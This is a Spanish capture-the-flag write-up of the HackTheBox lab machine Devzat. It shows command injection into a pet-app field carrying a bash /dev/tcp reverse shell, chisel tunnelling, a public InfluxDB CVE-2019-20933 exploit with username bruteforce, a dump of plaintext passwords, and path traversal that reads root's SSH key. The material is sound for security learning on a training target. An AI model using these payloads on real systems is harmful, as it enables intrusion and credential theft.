Devzat es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Devzat 10.10.11.118 a /etc/hosts como devzat.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
# Nmap 7.92 scan initiated Wed Jan 12 08:02:12 2022 as: nmap -sV -sC -oA enumeration/nmap 10.10.11.118 Nmap scan report for 10.10.11.118 Host is up (0.047s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA) | 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA) |_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519) 80/tcp open http Apache httpd 2.4.41 |_http-title: Did not follow redirect to http://devzat.htb/ |_http-server-header: Apache/2.4.41 (Ubuntu) 8000/tcp open ssh (protocol 2.0) | fingerprint-strings: | NULL: |_ SSH-2.0-Go | ssh-hostkey: |_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8000-TCP:V=7.92%I=7%D=1/12%Time=61DE7CFD%P=x86_64-pc-linux-gnu%r(NU SF:LL,C,"SSH-2\.0-Go\r\n"); Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 12 08:02:53 2022 -- 1 IP address (1 host up) scanned in 41.71 seconds |
Revisamos los puertos existentes y vemos dos interesnates, el puerto 80 que pertenece a una página web y el puerto 8000 en el cual hay una aplicación de go mediante ssh.
Enumeración
Comenzamos la enumeración revisando el portal web a través de la url de devzat.htb
Revisamos la web y encontramos una cosa interesante casi al final de la misma, donde indica como conectarnos a un chat a través de ssh y el puerto 8000 visto anteriormente
Así que vamos a conectarnos al mismo
1 2 3 4 5 6 7 8 9 10 11 12 |
$ ssh -l devbot devzat.htb -p 8000 Nickname already in use, please choose a different one. > devzat Less than a minute earlier devbot: You seem to be new here hi. Welcome to Devzat! Run /help to see what you can do. devbot: hi has joined the chat hi: how are u devbot: hi has left the chat devbot: hi stayed on for 2 minutes Welcome to the chat. There are no more users devbot: devzat has joined the chat devzat: |
Vemos la ayuda del chat
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
devzat: /help [SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat [SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere. [SYSTEM] [SYSTEM] Interesting features: [SYSTEM] • Many, many commands. Run /commands. [SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room. [SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines. [SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example. [SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user. [SYSTEM] • Timezone support, use /tz Continent/City to set your timezone. [SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games. [SYSTEM] • Emoji replacements! (like on Slack and Discord) [SYSTEM] [SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php. [SYSTEM] [SYSTEM] Made by Ishan Goel with feature ideas from friends. [SYSTEM] Thanks to Caleb Denio for lending his server! [SYSTEM] [SYSTEM] For a list of commands run |
Y los comandos disponibles del mismo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
devzat: /commands [SYSTEM] Commands [SYSTEM] clear - Clears your terminal [SYSTEM] message - Sends a private message to someone [SYSTEM] users - Gets a list of the active users [SYSTEM] all - Gets a list of all users who has ever connected [SYSTEM] exit - Kicks you out of the chat incase your client was bugged [SYSTEM] bell - Toggles notifications when you get pinged [SYSTEM] room - Changes which room you are currently in [SYSTEM] id - Gets the hashed IP of the user [SYSTEM] commands - Get a list of commands [SYSTEM] nick - Change your display name [SYSTEM] color - Change your display name color [SYSTEM] timezone - Change how you view time [SYSTEM] emojis - Get a list of emojis you can use [SYSTEM] help - Get generic info about the server [SYSTEM] tictactoe - Play tictactoe [SYSTEM] hangman - Play hangman [SYSTEM] shrug - Drops a shrug emoji [SYSTEM] ascii-art - Bob ross with text [SYSTEM] example-code - Hello world! devzat: |
Después de revisar un rato el chat y las opciones disponibles, parece que no podemos hacer mucho más por ahora así que vamos a realizar una serie de enumeraciones y encontramos un dominio interesante al hacer la enumeración de virtualhosts
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://devzat.htb :: Wordlist : FUZZ: /home/asdf/github/SecLists/Discovery/DNS/subdomains-top1million-5000.txt :: Header : Host: FUZZ.devzat.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ pets [Status: 200, Size: 510, Words: 20, Lines: 21] :: Progress: [4997/4997] :: Job [1/1] :: 855 req/sec :: Duration: [0:00:09] :: Errors: 0 :: |
Descubrimos la url de pets.devzat.htb que se trata de un inventario de mascotas
No parece que haya mucho más por aqui así que enumeramos directorios con gobuster y encontramos uno en concreto que nos será de ayuda
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
$ gobuster dir -u http://pets.devzat.htb/ -w ~/github/SecLists/Discovery/Web-Content/raft-small-words.txt -t 150 -b 200,404 =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://pets.devzat.htb/ [+] Method: GET [+] Threads: 150 [+] Wordlist: /home/asdf/github/SecLists/Discovery/Web-Content/raft-small-words.txt [+] Negative Status codes: 200,404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/01/12 08:21:24 Starting gobuster in directory enumeration mode =============================================================== /css (Status: 301) [Size: 40] [--> /css/] /build (Status: 301) [Size: 42] [--> /build/] /server-status (Status: 403) [Size: 280] /.git (Status: 301) [Size: 41] [--> /.git/] =============================================================== 2022/01/12 08:21:45 Finished =============================================================== |
Vemos que hay un directorio de git por lo que utilizaremos la tool de git-dumper para descargar su contenido
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 |
$ ~/github/git-dumper/git-dumper.py http://pets.devzat.htb/.git pets-git [-] Testing http://pets.devzat.htb/.git/HEAD [200] [-] Testing http://pets.devzat.htb/.git/ [200] [-] Fetching common files [-] Fetching http://pets.devzat.htb/.gitignore [200] [-] Fetching http://pets.devzat.htb/.git/description [200] [-] Fetching http://pets.devzat.htb/.git/hooks/applypatch-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/COMMIT_EDITMSG [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-push.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/post-commit.sample [404] [-] Fetching http://pets.devzat.htb/.git/hooks/post-receive.sample [404] [-] Fetching http://pets.devzat.htb/.git/hooks/commit-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-receive.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-rebase.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/post-update.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-commit.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/pre-applypatch.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/prepare-commit-msg.sample [200] [-] Fetching http://pets.devzat.htb/.git/hooks/update.sample [200] [-] Fetching http://pets.devzat.htb/.git/objects/info/packs [404] [-] Fetching http://pets.devzat.htb/.git/index [200] [-] Fetching http://pets.devzat.htb/.git/info/exclude [200] [-] Finding refs/ [-] Fetching http://pets.devzat.htb/.git/FETCH_HEAD [404] [-] Fetching http://pets.devzat.htb/.git/HEAD [200] [-] Fetching http://pets.devzat.htb/.git/ORIG_HEAD [404] [-] Fetching http://pets.devzat.htb/.git/config [200] [-] Fetching http://pets.devzat.htb/.git/info/refs [404] [-] Fetching http://pets.devzat.htb/.git/logs/HEAD [200] [-] Fetching http://pets.devzat.htb/.git/logs/refs/heads/master [200] [-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/HEAD [404] [-] Fetching http://pets.devzat.htb/.git/logs/refs/remotes/origin/master [404] [-] Fetching http://pets.devzat.htb/.git/packed-refs [404] [-] Fetching http://pets.devzat.htb/.git/logs/refs/stash [404] [-] Fetching http://pets.devzat.htb/.git/refs/heads/master [200] [-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/HEAD [404] [-] Fetching http://pets.devzat.htb/.git/refs/remotes/origin/master [404] [-] Fetching http://pets.devzat.htb/.git/refs/stash [404] [-] Fetching http://pets.devzat.htb/.git/refs/wip/wtree/refs/heads/master [404] [-] Fetching http://pets.devzat.htb/.git/refs/wip/index/refs/heads/master [404] [-] Finding packs [-] Finding objects [-] Fetching objects [-] Fetching http://pets.devzat.htb/.git/objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7e/58517e9052d2ce28d12c549dc6ad30423e4c15 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3c/6dd07ff39376f9d6f513b06167cc46b3a5af98 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bc/b397a0fe8794bf9f03b934812f1efee5533f34 [200] [-] Fetching http://pets.devzat.htb/.git/objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828 [200] [-] Fetching http://pets.devzat.htb/.git/objects/5b/2f2f4b425c4a753d5fb1bd01df5c2389dd95e0 [200] [-] Fetching http://pets.devzat.htb/.git/objects/da/93220bc34984be11385afbbe6cd044e7b455eb [200] [-] Fetching http://pets.devzat.htb/.git/objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705 [200] [-] Fetching http://pets.devzat.htb/.git/objects/69/f1153887d2790c94f23a00c6f85958cf198418 [200] [-] Fetching http://pets.devzat.htb/.git/objects/e1/e271c00e31d309e9bab411caeef86d6d6d0d57 [200] [-] Fetching http://pets.devzat.htb/.git/objects/47/7b607f55d0d610decf739027ad1cad7846e8a1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/59/b0e7c7cdc9f76c39eac534d56f2d92d1f995fe [200] [-] Fetching http://pets.devzat.htb/.git/objects/d1/ac9ba1169e4076832034c5585e1c5bf9d6f83c [200] [-] Fetching http://pets.devzat.htb/.git/objects/94/caeb6c465d2de18aa8cf364c56dd7515ea2a1a [200] [-] Fetching http://pets.devzat.htb/.git/objects/ae/444e098873c82b664e7e6204594e5db26126ff [200] [-] Fetching http://pets.devzat.htb/.git/objects/9d/f490e8cfdd75704d31f518caf76ab34494b124 [200] [-] Fetching http://pets.devzat.htb/.git/objects/03/cd4553f4c458eaef2f9734925b4e6e8c0d6df9 [200] [-] Fetching http://pets.devzat.htb/.git/objects/50/a0732c90552ff2e7ddd92d79fa964c0d9cd5eb [200] [-] Fetching http://pets.devzat.htb/.git/objects/b8/a8f656e1607a2c36884d3165872ef3515b5879 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7b/1ba8363499e091996af78355e71d504b220312 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bb/28a9414d456a3e71bc1ffca30e95b98f6dc2f1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/e9/f54b13d5e925602e04501415ced4bc0bc881d2 [200] [-] Fetching http://pets.devzat.htb/.git/objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62 [200] [-] Fetching http://pets.devzat.htb/.git/objects/dc/52d954d8d7f62c82cf63236d27093764a3d046 [200] [-] Fetching http://pets.devzat.htb/.git/objects/73/c1a4d5d156b6ddc62a7e3eba1c206bd6ad19c8 [200] [-] Fetching http://pets.devzat.htb/.git/objects/9d/ba8c340bf81622be7b48a7a3546869bfb851d4 [200] [-] Fetching http://pets.devzat.htb/.git/objects/fc/567cd2f11d83683d9eb4ca1a5fdc912f7d417c [200] [-] Fetching http://pets.devzat.htb/.git/objects/d0/5ea581fbbf17eb0d3139f9937ac6a8fde98685 [200] [-] Fetching http://pets.devzat.htb/.git/objects/54/f95a54c49178dd5d496058e4ee99829748c49a [200] [-] Fetching http://pets.devzat.htb/.git/objects/fa/e180dacc52937c1d6a24636431663d6754fef5 [200] [-] Fetching http://pets.devzat.htb/.git/objects/b0/00a57acd3e3027fac564a394704a66c824b76d [200] [-] Fetching http://pets.devzat.htb/.git/objects/00/00000000000000000000000000000000000000 [404] [-] Fetching http://pets.devzat.htb/.git/objects/a4/04baa1852e12d51e5941285100091e9380bb03 [200] [-] Fetching http://pets.devzat.htb/.git/objects/82/74d7a547c0c3854c074579dfc359664082a8f6 [200] [-] Fetching http://pets.devzat.htb/.git/objects/1b/ac702fbb64129fc77d16b3e0c6652cf2ebc852 [200] [-] Fetching http://pets.devzat.htb/.git/objects/46/24e1f42ce009c31dba5a7c05df4c74472bd5be [200] [-] Fetching http://pets.devzat.htb/.git/objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07 [200] [-] Fetching http://pets.devzat.htb/.git/objects/8d/a69971e32e6e08cae489b40731845d1de13258 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813 [200] [-] Fetching http://pets.devzat.htb/.git/objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d5/84aafd3a034f1f93b4c2cfa285a77798965c2d [200] [-] Fetching http://pets.devzat.htb/.git/objects/af/e315244f6dae3beda0159693d25a6e0466dd90 [200] [-] Fetching http://pets.devzat.htb/.git/objects/6f/3c2fa527470bae3ce951717b431c2fe5c38332 [200] [-] Fetching http://pets.devzat.htb/.git/objects/1d/69311c0a33ed5f21e8384641b310cc24e5701c [200] [-] Fetching http://pets.devzat.htb/.git/objects/db/70e73e473f8ed16d596ab0fd373f3423fc8512 [200] [-] Fetching http://pets.devzat.htb/.git/objects/68/27c53e0d5e2f69f9fa7eb4f5b4b05ee429f539 [200] [-] Fetching http://pets.devzat.htb/.git/objects/bd/7e818ef2c4c78fe5f61a0285df390aa3fa0e43 [200] [-] Fetching http://pets.devzat.htb/.git/objects/f3/3e8162997aaa9da582aa81428ee87aa48953a6 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d5/eee74298e64b35d51a1ded2a482ae9cbbfd3c1 [200] [-] Fetching http://pets.devzat.htb/.git/objects/7c/8dc57a3e2266715fac1ccdb4d677982154c16d [200] [-] Fetching http://pets.devzat.htb/.git/objects/17/b8e146f96cd4cd6bd9d5a9215ade0e8cad656e [200] [-] Fetching http://pets.devzat.htb/.git/objects/5d/cebd6a2a7127228bf4330ae18b78785942ec19 [200] [-] Fetching http://pets.devzat.htb/.git/objects/4e/48a46697302eb89d858229ec12ad23edd9b259 [200] [-] Fetching http://pets.devzat.htb/.git/objects/dc/e459d0e5a832b08688e2331557535d60d8a171 [200] [-] Fetching http://pets.devzat.htb/.git/objects/3e/967e5015bbcd3460dd43f8acc05b3125eac4cd [200] [-] Fetching http://pets.devzat.htb/.git/objects/47/a0383d182b9413440099ee04c25954e08494e8 [200] [-] Fetching http://pets.devzat.htb/.git/objects/d9/2ef698d7cbc3c1014a125e4dcd53be770d5beb [200] [-] Fetching http://pets.devzat.htb/.git/objects/28/a51e070175ab78da05529ff059367df9df3e57 [200] [-] Running git checkout . |
Revisamos el código existente y observamos que cuando carga la especie, ejecuta el comando sin aplicar ninguna validación ni saneamiento sobre la misma, por lo que puede ser un punto de entrada
1 2 3 4 5 6 7 8 |
func loadCharacter(species string) string { cmd := exec.Command("sh", "-c", "cat characteristics/"+species) stdoutStderr, err := cmd.CombinedOutput() if err != nil { return err.Error() } return string(stdoutStderr) } |
Dicho esto interceptaremos la petición de creación de mascota con burp suite y editaremos el valor del campo species por nuestra rev shell que será la siguiente
1 |
bash -i >& /dev/tcp/IP/PORT 0>&1 |
La codificamos en base 64 y la enviaremos a través de burp
Y obtendremos una shell con el usuario patrick en nuestra escucha
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.2] from devzat.htb [10.10.11.118] 38912 bash: cannot set terminal process group (822): Inappropriate ioctl for device bash: no job control in this shell patrick@devzat:~/pets$ id id uid=1000(patrick) gid=1000(patrick) groups=1000(patrick) patrick@devzat:~/pets$ |
Ya estamos dentro, pero este usuario no es capaz de obtener la flag así que vamos a enumerar el sistema en detalle y encontramos un proceso muy interesante
1 2 |
patrick@devzat:~$ ps aux|grep docker| grep -v grep|grep proxy root 1253 0.0 0.1 549312 3888 ? Sl 07:02 0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086 |
En la máquina existe un contendor con el cual redirecciona el puerto 8086 de local al mismo, así que vamos a ver que hay aqui.
Para ello necesitaremos abrir un tunel entre nuestra máquina y la víctima y para ello utilizaremos chisel.
Así que vamos a ello, en primer lugar necesitaremos levantar el servidor
1 2 3 4 |
$ chisel server -p 8000 --reverse 2022/01/12 09:13:42 server: Reverse tunnelling enabled 2022/01/12 09:13:42 server: Fingerprint 73p8CtOWHKemanx5sjWhIx6yTBWl5lYJ3GU3cYHi03Y= 2022/01/12 09:13:42 server: Listening on http://0.0.0.0:8000 |
Posteriormente levantamos el cliente que se conectará a nuestro servidor
1 2 3 |
patrick@devzat:/tmp$ ./chisel_1.7.6_linux_amd64 client 10.10.14.2:8000 R:8086 2022/01/12 08:40:20 client: Connecting to ws://10.10.14.2:8000 2022/01/12 08:40:21 client: Connected (Latency 60.55383ms) |
Y veremos como tenemos la escucha y el puerto 8086 de la máquina devzat redireccionado al 8086 local
1 2 3 4 5 6 |
$ chisel server -p 8000 --reverse 2022/01/12 09:32:28 server: Reverse tunnelling enabled 2022/01/12 09:32:28 server: Fingerprint UkgTUpewy1KFU02O0qg/aR5rd/kBTX14sI3Fgk/RFtY= 2022/01/12 09:32:28 server: Listening on http://0.0.0.0:8000 2022/01/12 09:32:28 server: session#1: Client version (1.7.6) differs from server version (0.0.0-src) 2022/01/12 09:35:07 server: session#2: tun: proxy#R:8086=>8086: Listening |
Así que vamos a utilizar nmap para descubrir que hay en ese puerto
1 2 3 4 5 6 7 8 9 |
# Nmap 7.92 scan initiated Wed Jan 12 09:36:31 2022 as: nmap -p 8086 -sV -oA enumeration/nmap_2 127.0.0.1 Nmap scan report for localhost (127.0.0.1) Host is up (0.00014s latency). PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jan 12 09:36:38 2022 -- 1 IP address (1 host up) scanned in 7.19 seconds |
Descubrimos que se trata de un InfluxDB y además sabemos también su versión 1.7.5 por lo que vamos a google y encontramos la vulnerabilidad CVE-2019-20933 y un exploit público para su explotación
Así que lo ejecutamos
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 |
$ python3 __main__.py _____ __ _ _____ ____ ______ _ _ _ |_ _| / _| | | __ \| _ \ | ____| | | (_) | | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| | | |_| CVE-2019-20933 Insert ip host (default localhost): Insert port (default 8086): Insert influxdb user (wordlist path to bruteforce username): /home/asdf/github/SecLists/Usernames/Names/names.txt Start username bruteforce [x] aaliyah [x] aaren [x] aarika [x] aaron [x] aartjan [x] aarushi [x] abagael [x] abagail [x] abahri [x] abbas [x] abbe [x] abbey [x] abbi [x] abbie [x] abby [x] abbye [x] abdalla [x] abdallah [x] abdul [x] abdullah [x] abe [x] abel [x] abi [x] abia [x] abigael [x] abigail [x] abigale [x] abra [x] abraham [x] abram [x] abree [x] abrianna [x] abriel [x] abrielle [x] abu [x] aby [x] acacia [x] access [x] accounting [x] ace [x] achal [x] achamma [x] action [x] ada [x] adah [x] adair [x] adalia [x] adaline [x] adalyn [x] adam [x] adan [x] adara [x] adda [x] addi [x] addia [x] addie [x] addilyn [x] addison [x] addons [x] addy [x] ade [x] adel [x] adela [x] adelaida [x] adelaide [x] adele [x] adelene [x] adelheid [x] adelia [x] adelice [x] adelina [x] adelind [x] adeline [x] adella [x] adelle [x] adelynn [x] aden [x] adena [x] adeniyi [x] adey [x] adi [x] adiana [x] adie [x] adina [x] aditya [v] admin Host vulnerable !!! Databases list: 1) devzat 2) _internal Insert database name (exit to close): |
Y bingo!, vamos a revisar que tablas existen en el esquema devzat
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
[devzat] Insert query (exit to change db): show measurements { "results": [ { "series": [ { "columns": [ "name" ], "name": "measurements", "values": [ [ "user" ] ] } ], "statement_id": 0 } ] } |
Y vamos a sacar los datos de la tabla user
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
[devzat] Insert query (exit to change db): select * from "user" { "results": [ { "series": [ { "columns": [ "time", "enabled", "password", "username" ], "name": "user", "values": [ [ "2021-06-22T20:04:16.313965493Z", false, "WillyWonka2021", "wilhelm" ], [ "2021-06-22T20:04:16.320782034Z", true, "woBeeYareedahc7Oogeephies7Aiseci", "catherine" ], [ "2021-06-22T20:04:16.996682002Z", true, "RoyalQueenBee$", "charles" ] ] } ], "statement_id": 0 } ] } |
Y tenemos una password.
Obteniendo la flag de user
Utilizamos la password obtenida para escalar privilegios y conseguir la primera flag
1 2 3 4 5 6 7 |
patrick@devzat:~$ su - catherine Password: catherine@devzat:~$ ls -l total 4 -r-------- 1 catherine catherine 33 Jan 12 07:02 user.txt catherine@devzat:~$ cat user.txt 4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf |
Escalado de privilegios
Bueno llegados a este punto, vamos a enumerar otra vez la máquina a ver que descubrimos ahora y encontramos dos backups muy suculentos
1 2 3 4 5 6 7 8 9 |
catherine@devzat:/var/backups$ ll total 140 drwxr-xr-x 2 root root 4096 Sep 29 16:25 ./ drwxr-xr-x 14 root root 4096 Jun 22 2021 ../ -rw-r--r-- 1 root root 59142 Sep 28 18:45 apt.extended_states.0 -rw-r--r-- 1 root root 6588 Sep 21 20:17 apt.extended_states.1.gz -rw-r--r-- 1 root root 6602 Jul 16 06:41 apt.extended_states.2.gz -rw------- 1 catherine catherine 28297 Jul 16 07:00 devzat-dev.zip -rw------- 1 catherine catherine 27567 Jul 16 07:00 devzat-main.zip |
Uno corresponde al entorno de desarrollo y el otro al entorno principal al que nos conectamos anteriormente, así que nos descargamos los mismos y revisamos las diferencias entre ambos entornos, en concreto, y después de un rato buscando, del fichero commands.go
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 |
$ diff main/commands.go dev/commands.go 3a4 > "bufio" 4a6,7 > "os" > "path/filepath" 36a40 > file = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil} 38c42,101 < commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} > } > > func fileCommand(u *user, args []string) { > if len(args) < 1 { > u.system("Please provide file to print and the password") > return > } > > if len(args) < 2 { > u.system("You need to provide the correct password to use this function") > return > } > > path := args[0] > pass := args[1] > > // Check my secure password > if pass != "CeilingCatStillAThingIn2021?" { > u.system("You did provide the wrong password") > return > } > > // Get CWD > cwd, err := os.Getwd() > if err != nil { > u.system(err.Error()) > } > > // Construct path to print > printPath := filepath.Join(cwd, path) > > // Check if file exists > if _, err := os.Stat(printPath); err == nil { > // exists, print > file, err := os.Open(printPath) > if err != nil { > u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error())) > return > } > defer file.Close() > > scanner := bufio.NewScanner(file) > for scanner.Scan() { > u.system(scanner.Text()) > } > > if err := scanner.Err(); err != nil { > u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error())) > } > > return > > } else if os.IsNotExist(err) { > // does not exist, print error > u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath)) > return > } > // bokred? > u.system("Something went badly wrong.") |
Y vemos que hay una diferencia entre ambos entornos, y es que en dev hay un comando que no pasó a main
1 2 3 |
< commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode} --- > commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file} |
Además el puerto del entorno de dev es diferente
1 2 |
$ cat devchat.go |grep "port =" port = 8443 |
Así que vamos a conectarnos y a probar el mismo
1 2 3 4 5 6 7 8 9 |
catherine@devzat:/var/backups$ ssh -l test localhost -p 8443 The authenticity of host '[localhost]:8443 ([127.0.0.1]:8443)' can't be established. ED25519 key fingerprint is SHA256:liAkhV56PrAa5ORjJC5MU4YSl8kfNXp+QuljetKw0XU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[localhost]:8443' (ED25519) to the list of known hosts. Welcome to the chat. There are no more users devbot: test has joined the chat test: /file [SYSTEM] Please provide file to print and the password |
Parece que podemos obtener cualquier fichero del servidor así que vamos a tratar de obtener la key ssh del usuario root
1 2 3 4 5 6 7 8 9 |
test: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021? [SYSTEM] -----BEGIN OPENSSH PRIVATE KEY----- [SYSTEM] b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW [SYSTEM] ...... [SYSTEM] ...... [SYSTEM] ...... [SYSTEM] ..... [SYSTEM] -----END OPENSSH PRIVATE KEY----- test: |
Y Bingo! la tenemos, aunque obviamente no vamos a ponerla aquí también.
Obteniendo la flag de root
Ahora que ya tenemos la key de root la utilizaremos para acceder por ssh y obtener la flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
$ ssh -i keys/root.pem root@devzat.htb Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Wed 12 Jan 2022 09:10:41 AM UTC System load: 0.8 Processes: 245 Usage of /: 60.0% of 7.81GB Users logged in: 1 Memory usage: 40% IPv4 address for docker0: 172.17.0.1 Swap usage: 0% IPv4 address for eth0: 10.10.11.118 107 updates can be applied immediately. 33 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Oct 11 14:28:01 2021 root@devzat:~# ls -l total 12 drwxr-x--- 2 root root 4096 Jul 16 06:56 devzat drwxr-xr-x 3 root root 4096 Jun 22 2021 go -r-------- 1 root root 33 Jan 12 07:02 root.txt root@devzat:~# cat root.txt 9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx6 root@devzat:~# |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace